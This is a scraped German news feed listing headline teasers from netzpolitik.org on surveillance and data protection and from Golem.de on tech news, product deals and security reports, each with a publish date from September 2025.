Unternehmen dürfen weiter ohne besondere Schutzmaßnahmen Daten von Europäer:innen in die USA schicken. Eine Klage gegen das EU-US-Data-Privacy-Framework ist gescheitert. Nun könnte das Problem erneut vor dem EuGH landen.

Article link

Date of publish: Wed, 03 Sep 2025 14:17:45 +0000

Australisches Gutachten: Anbieter von Alterskontrollen horten biometrische Daten

Ein Mensch lässt sein Gesicht per Smartphone biometrisch scannen.
In Australien sollen bald alle ständig ihr Gesicht scannen lassen (Symbolbild) – Alle Rechte vorbehalten IMAGO / imagebroker, Bearbeitung: netzpolitik.org
Ein Gutachten im Auftrag der australischen Regierung hat Systeme für Alterskontrollen untersucht. Die zuständige Ministerin sieht sich in ihren Plänen bestätigt. Doch abseits einiger rosiger Formulierungen übt das Gutachten alarmierende Kritik. Ein Kommentar.

Article link

Date of publish: Wed, 03 Sep 2025 11:27:46 +0000

Big-Data-Rasterfahndung: Die Palantir-Konkurrenz schläft nicht

Alexander DOBRINDT Bundesinnenminister und Markus SOEDER Ministerpraesident Bayern und CSU-Vorsitzender machen sich ein Bild von den Grenzkontrollen der Bayerischen Grenzpolizei am Grenzuebergang Kiefersfelden / Inntal Ost am 15.05.2025 *** Alexander DOBRINDT Federal Minister of the Interior and Markus SOEDER State Premier of Bavaria and CSU Chairman take a look at the border controls of the Bavarian Border Police at the Kiefersfelden Inntal Ost border crossing on 15 May 2025
Alexander Dobrindt (CSU) mit Parteifreund und Ministerpräsident Markus Söder, dessen Bundesland Palantir als Dauerlösung einsetzt. – Alle Rechte vorbehalten IMAGO / Sven Simon
Innenminister Dobrindt braucht IT-Dienstleister, wenn er die automatisierte Datenanalyse bei den Polizeien des Bundes wie geplant gesetzlich erlauben will. Dass es Alternativlösungen zum US-Konzern Palantir gibt, ist kein Geheimnis.

Article link

Date of publish: Wed, 03 Sep 2025 07:18:32 +0000

Bundespolizeigesetz: Harte Zeiten für den demokratischen Rechtsstaat

Polizisten
Bereitschaftspolizei der Bundespolizei. CC-BY-NC-ND 4.0 Bundespolizei
Die Bundesregierung will ein neues Bundespolizeigesetz schaffen. Die alte Ampel-Regierung hatte dabei zumindest auch progressive Instrumente geplant. Der aktuelle Gesetzentwurf von schwarz-rot ist ein Schritt in Richtung Autoritarismus und Überwachungsstaat.

Article link

Date of publish: Tue, 02 Sep 2025 13:17:22 +0000

Hikvision: Hersteller der Hamburger KI-Überwachungskameras ist für Menschenrechtsverletzungen bekannt

Vier Kameras an einem Mast
Kameras von Hikvision, wie hier am Hamburger Hansaplatz, werden zur Kontrolle von Minderheiten eingesetzt. – Alle Rechte vorbehalten IMAGO / Chris Emil Janßen
In Hamburg wird seit gestern eine KI mit den Bildern von Passant*innen trainiert. Sie stammen aus Überwachungskameras des chinesischen Herstellers Hikvision. Diese Kameras können viel mehr als sie dürfen. Produkte des teilstaatlichen Unternehmens werden auch genutzt, um Uigur*innen und Palästinenser*innen zu überwachen.

Article link

Date of publish: Tue, 02 Sep 2025 09:44:16 +0000

Österreich: Das Amtsgeheimnis ist weg, es lebe die Informationsfreiheit!

Bergkulisse mit Österreichfahne im Vordergrund
Der Weg in die Informationsfreiheit in Österreich ist nun beschildert (Symbolbild) – Gemeinfrei-ähnlich freigegeben durch unsplash.com Landschaft: Toru Wa, Schloss: Vladislav K., Bearbeitung:netzpolitik.org
Ab 1. September gilt in Österreich ein Informationsfreiheitsgesetz, endlich. Doch damit öffentliche Stellen die neuen Transparenzvorgaben auch wirklich einhalten, braucht es interessierte Bürger*innen, einen Kulturwandel in der Verwaltung und engagierte Beobachter*innen.

Article link

Date of publish: Mon, 01 Sep 2025 13:34:36 +0000

Golem.de

Digitale Zombies: Wie Perry Rhodan vor exzessivem Medienkonsum warnte

Mediensüchtige Außerirdische, sinnlose Spielereien: Was in den sechziger Jahren bei Perry Rhodan Fernsehkritik war, klingt heute wie Kritik an unserem Medienkonsum. Von Marius Pieruschka (Unterhaltung & Hobby, Smartphone)

Article link

Date of publish: Sat, 13 Sep 2025 09:00:01 +0200

Hilfloses Unternehmen: Mittelständler wird Opfer von Manipulation auf Google Maps

Ein Unternehmen erhält ohne Kenntnisnahme auf Google Maps einen anderen Namen. Google kann es wochenlang nicht korrigieren. Bis es dann doch geht. Eine Recherche von Ingo Pakalski (Google Maps, Google)

Article link

Date of publish: Sat, 13 Sep 2025 08:00:02 +0200

Network-Slicing und MCx: Telekom bietet neuen Dienst für Blaulichtorganisationen

Die Telekom und andere Netzbetreiber bieten Blaulichtorganisationen neue Dienste. Die Bundesanstalt für den Digitalfunk braucht zu viel Zeit. (Infrastruktur, Long Term Evolution)

Article link

Date of publish: Fri, 12 Sep 2025 18:48:02 +0200

Anzeige: Mini-PC mit Intel-CPU und Windows 11 Pro für unter 180 Euro

Der Mini-PC Vista Mini V1 von Acemagician ist bei Amazon 80 Euro reduziert. Günstiger war er für Nutzer ohne Prime-Abonnement noch nie. (PC, Computer)

Article link

Date of publish: Fri, 12 Sep 2025 18:25:02 +0200

Anzeige: Unter 400 Euro für den 144-Hz-QLED-TV Hisense E7Q Pro

Der Hisense 50E7Q Pro bietet 144 Hz und Freesync Premium. Aktuell gibt es den 50-Zoll-QLED-TV bei Amazon zum historischen Tiefstpreis. (Fernsehen, Amazon)

Article link

Date of publish: Fri, 12 Sep 2025 17:45:09 +0200

Überwachung: US-Investoren sind größte Geldgeber für Spyware

Innnerhalb von nur einem Jahr ist die Zahl der Spyware-Investoren aus den USA so stark angestiegen, dass sie nun den Spitzenplatz besetzen. (Politik, Security)

Article link

Date of publish: Fri, 12 Sep 2025 17:27:02 +0200

IW: Unternehmen klagen weiter über langsames Internet

Selbst wenn sie vorhandene Glasfaser nicht nutzen, finden Firmen das Internet zu langsam. Zugleich gibt es FTTH noch nicht überall. (Wirtschaft, DSL)

Article link

Date of publish: Fri, 12 Sep 2025 16:54:02 +0200

Anzeige: Wireless CarPlay Adapter bei Amazon fast zum halben Preis

Der AIZEO CarPlay Adapter macht aus jedem kabelgebundenen CarPlay-System eine kabellose Lösung. Bei Amazon wurde der Preis fast halbiert. (Carplay, Technik/Hardware)

Article link

Date of publish: Fri, 12 Sep 2025 16:26:02 +0200

Nintendo: Teaser für The Super Mario Galaxy Movie veröffentlicht

Nintendo zeigt erstmals Szenen aus dem kommenden Mario-Film. Im Oktober 2025 gibt es Remaster der Galaxy-Spiele für die Switch 2. (Super Mario, Nintendo)

Article link

Date of publish: Fri, 12 Sep 2025 16:10:01 +0200

Microsoft: Xbox Cloud Gaming soll bald 1440p und höhere Bitraten bieten

Es gibt Hinweise, dass Xbox Cloud Gaming bald schärfer und mit weniger Kompressionsartefakten gestreamt wird. (Xbox, Microsoft)

Article link

Date of publish: Fri, 12 Sep 2025 15:53:02 +0200

Anzeige: Apple iPhone 17 Pro mit 120 Euro Tauschbonus bei Vodafone

Nach langem Warten sind die neuen Apple iPhones endlich auf dem Markt bestellbar. Vodafone bietet das iPhone 17 Pro zu spannenden Konditionen an. (iPhone 17, Apple)

Article link

Date of publish: Fri, 12 Sep 2025 15:50:02 +0200

Mehr Datenvolumen: Aldi Talk wertet Kombi- und Unlimited-Tarife auf

Der Discounter Aldi Talk passt seine Smartphone-Tarife ohne Aufpreis an. Kunden erhalten nun bis zu 100 GByte. (Aldi, Mobilfunktarif)

Article link

Date of publish: Fri, 12 Sep 2025 15:28:02 +0200

Anzeige: Elektrisches Schraubendreher-Set jetzt für unter 40 Euro

Das elektrische Mini-Schraubendreher-Set von Fanttik eignet sich für Feinarbeiten und ist bei Amazon mit Rabattcoupon erhältlich. (Technik/Hardware)

Article link

Date of publish: Fri, 12 Sep 2025 15:24:02 +0200

Ex-Google-Manager: Glaube an Jobs durch KI "100 Prozent Blödsinn"

Mo Gawdat war früher bei Google und glaubt nicht an Jobchancen durch KI. Stattdessen würden Arbeitsplätze vernichtet - auch im Management. (KI, Wirtschaft)

Article link

Date of publish: Fri, 12 Sep 2025 15:14:01 +0200

Anzeige: MicroSD-Karte von Lexar mit 512 GByte für unter 34 Euro

Eine MicroSD-Karte mit 512 GByte von Lexar ist bei Amazon erneut zum Tiefstpreis verfügbar. Im befristeten Angebot zahlt man unter 34 Euro. (Technik/Hardware, Speichermedien)

Article link

Date of publish: Fri, 12 Sep 2025 14:40:02 +0200

Anzeige: Apple iPhone 17 Pro Max mit Tarif 260 Euro günstiger bei o2

Apples neue iPhone-Serie ist seit heute vorbestellbar. Bei o2 sind bereits Bundles erhältlich. Besonders spannend ist das iPhone 17 Pro Max. (iPhone 17, Apple)

Article link

Date of publish: Fri, 12 Sep 2025 14:26:02 +0200

US-China-Spannungen: Chinesische Staatsbürger dürfen nicht mehr bei Nasa arbeiten

Die USA verschärfen das Vorgehen gegenüber China in der Raumfahrt. Der Ausschluss von chinesischen Staatsbürgern mit US-Visum ist dabei die jüngste Eskalationsstufe. (Nasa, Raumfahrt)

Article link

Date of publish: Fri, 12 Sep 2025 14:14:02 +0200

Star-Trek-Hörspiel: Ein Khan, wie man ihn noch nicht kannte

Nach Ricardo Montalbán und Benedict Cumberbatch ist Lost-Star Naveen Andrews der neue Khan Noonien Singh - in einem Hörspiel, das sich lohnt. Eine Rezension von Peter Osteried (Star Trek, Podcast)

Article link

Date of publish: Fri, 12 Sep 2025 14:00:02 +0200

Windows 11: Nano11 verkleinert Windows auf unter 3 GB

Extrem-Debloating heißt es bei Nano11. Dafür macht das Skript auch vor Windows Updates oder dem Windows Defender nicht Halt. (Windows 11, Microsoft)

Article link

Date of publish: Fri, 12 Sep 2025 13:53:02 +0200

Anzeige: Coolpow-Handyhalterung jetzt ein Drittel günstiger sichern

Die Coolpow MagSafe Handyhalterung ist für gesetzeskonforme Smartphone-Nutzung im Auto geeignet und kurz deutlich reduziert erhältlich. (Auto, Mobilität)

Article link

Date of publish: Fri, 12 Sep 2025 13:39:01 +0200

KI im öffentlichen Dienst: Chatbot soll in Albanien Ministerin werden

Der KI-Chatbot soll für die öffentliche Beschaffung zuständig sein und Ausschreibungen unbestechlich sowie zu 100 Prozent nachvollziehbar durchführen. (Chatbots, KI)

Article link

Date of publish: Fri, 12 Sep 2025 13:30:23 +0200

(g+) Ineffiziente Ressourcennutzung: Wenn schnellere Hardware zu langsamerer Software führt

Trotz Hardwareupgrades fühlen sich viele Anwendungen lahmer als ihre Vorgänger an. Der Grund ist, bildlich gesprochen, zu viel Ballast im Anhänger. Von Tim Reinboth (Denkpause, Arbeit)

Article link

Date of publish: Fri, 12 Sep 2025 13:30:01 +0200

GPS-Störung: Die Ostsee ist zunehmend Ziel von hybriden Angriffen

Hybride GPS-Angriffe auf die Schiffs- und Luftfahrt nehmen auch über deutschen Gewässern zu. Der Feind ist unbekannt, es gibt aber einen Verdacht. (Navigationssystem, GPS)

Article link

Date of publish: Fri, 12 Sep 2025 13:11:01 +0200

Gratis-Waschgänge ergaunert: Waschraum nach Waschmaschinen-Hacks geschlossen

Gehackte Waschmaschinen haben Studenten aus Amsterdam unzählige kostenlose Waschgänge beschert. Doch damit ist jetzt Schluss. (Cybercrime, Sicherheitslücke)

Article link

Date of publish: Fri, 12 Sep 2025 12:42:01 +0200

Bundestag: Klöckner untersagt Aufkleber auf Laptops

Julia Klöckner verschärft die Regeln im Bundestag: Aufkleber auf Laptops sind verboten - für Smartphones gelten klare Einschränkungen. (Deutscher Bundestag, Smartphone)

Article link

Date of publish: Fri, 12 Sep 2025 12:24:02 +0200

Anzeige: Full HD-Monitor von Lenovo jetzt so günstig wie noch nie

Der 23,8-Zoll-Monitor von Lenovo bietet Full HD zum bisher günstigsten Preis - ideal fürs Homeoffice, Studium oder den Zweitbildschirm. (Technik/Hardware, Display)

Article link

Date of publish: Fri, 12 Sep 2025 12:13:02 +0200

Microsoft Store: Keine Anmeldegebühren mehr für Entwickler

Wer eine App im Microsoft Store veröffentlichen möchte, zahlt keine Anmeldegebühren mehr. Auch eine Kreditkarte ist nicht mehr notwendig. (Windows Store, Microsoft)

Article link

Date of publish: Fri, 12 Sep 2025 12:06:01 +0200

Anzeige: Werkzeugtrolley von Meister jetzt 70 Euro günstiger kaufen

Der Meister-Werkzeugtrolley mit 156 Teilen ist Bestseller seiner Kategorie und bei Amazon aktuell deutlich günstiger. (Unterhaltung & Hobby)

Article link

Date of publish: Fri, 12 Sep 2025 12:03:01 +0200

SpaceX: Das Starship müsste nicht der Cybertruck der Raumfahrt sein

Das Starship ist eine Fehlkonstruktion. Es ist zu groß und zu schwer. Woher wissen wir das und wie viel besser könnte es sein? Ein Deep Dive von Frank Wunderlich-Pfeiffer (Starship, Raumfahrt)

Article link

Date of publish: Fri, 12 Sep 2025 12:00:02 +0200

Elon Musk: Ex-Tesla-Mitarbeiter wirft Musk Lügen und Manipulation vor

Ein langjähriger Tesla-Mitarbeiter verlässt das Unternehmen - und zwar explizit wegen Elon Musk. (Elon Musk, Elektroauto)

Article link

Date of publish: Fri, 12 Sep 2025 11:50:01 +0200

Wirtschaft: KI-Akzeptanz in großen Firmen rückläufig

Eine Befragung von 1,2 Millionen US-Unternehmen verzeichnet den stärksten Rückgang der Akzeptanz von KI seit November 2023. (KI, Wirtschaft)

Article link

Date of publish: Fri, 12 Sep 2025 11:28:02 +0200

Actionspiel: EA stellt Battle Royale für Battlefield 6 vor

Es gibt offizielle Informationen: Battle Royale für Battlefield 6 bietet klassenbasiertes Squadplay, zerstörbare Karten und Fahrzeuge. (Battle Royale, Electronic Arts)

Article link

Date of publish: Fri, 12 Sep 2025 11:09:01 +0200

Werbefreies Streaming: Spotify greift juristisch gegen Revanced durch

Android-Nutzer können mit Revanced ohne Premiumabo werbefrei bei Spotify streamen. Der Streaminganbieter geht per DMCA dagegen vor. (Spotify, Urheberrecht)

Article link

Date of publish: Fri, 12 Sep 2025 10:54:02 +0200

Restrukturierung: OpenAI und Microsoft einigen sich auf Veränderungen

OpenAI möchte sein Geschäftsmodell umstellen. Jetzt hat das Unternehmen dafür eine erste vorläufige Einigung mit Microsoft erreicht. (OpenAI, Microsoft)

Article link

Date of publish: Fri, 12 Sep 2025 10:30:01 +0200

Probefahrt mit Level 2++: Mercedes macht es jetzt wie Tesla

Mercedes bringt mit den neuen Elektroautos das überwachte automatisierte Fahren auf die Straße. Das Konzept erinnert stark an das Vorgehen von Musk. Ein Bericht von Friedhelm Greis (Autonomes Fahren, Elektroauto)

Article link

Date of publish: Fri, 12 Sep 2025 10:09:01 +0200

Infotainment: BMW-Fahrer nutzen Carplay weniger für Navigation

BMW will kein Carplay Ultra verwenden. Grund dafür könnten interne Daten sein, denen zufolge BMW-Fahrer Carplay weniger als Navi nutzen. (Carplay, Apple)

Article link

Date of publish: Fri, 12 Sep 2025 09:31:02 +0200

Spionage auf dem iPhone: Neue Spyware-Attacken treffen Apple-Nutzer

Seit 2021 hat Apple bereits Betroffene aus über 150 Ländern vor Spyware-Attacken gewarnt. Die jüngste Angriffswelle ist schon die vierte in diesem Jahr. (Spionage, Apple)

Article link

Date of publish: Fri, 12 Sep 2025 09:13:02 +0200

Foundation: Apple TV+ hat vierte Staffel bestellt

Das Finale der dritten Staffel von Foundation läuft heute. Schade, dass es aus ist - gut ist, dass Apple die vierte Staffel bestellt hat. (Isaac Asimov, Apple TV)

Article link

Date of publish: Fri, 12 Sep 2025 08:32:02 +0200

Autoindustrie: IG Metall und VDA fordern bessere Elektroauto-Bedingungen

Gewerkschaft und Autoverband fordern von der Politik weniger strenge CO2-Regeln und mehr Unterstützung für Elektroautos. (Elektroauto, Auto)

Article link

Date of publish: Fri, 12 Sep 2025 08:21:01 +0200

Oracle-Mitgründer Larry Ellison dabei: Paramount will Warner Bros. kaufen

Im Filmgeschäft könnte es bald eine neue Milliardenübernahme geben. Diesmal ist nicht Paramount das Ziel, sondern Warner Bros. (Paramount, Larry Ellison)

Article link

Date of publish: Fri, 12 Sep 2025 08:06:01 +0200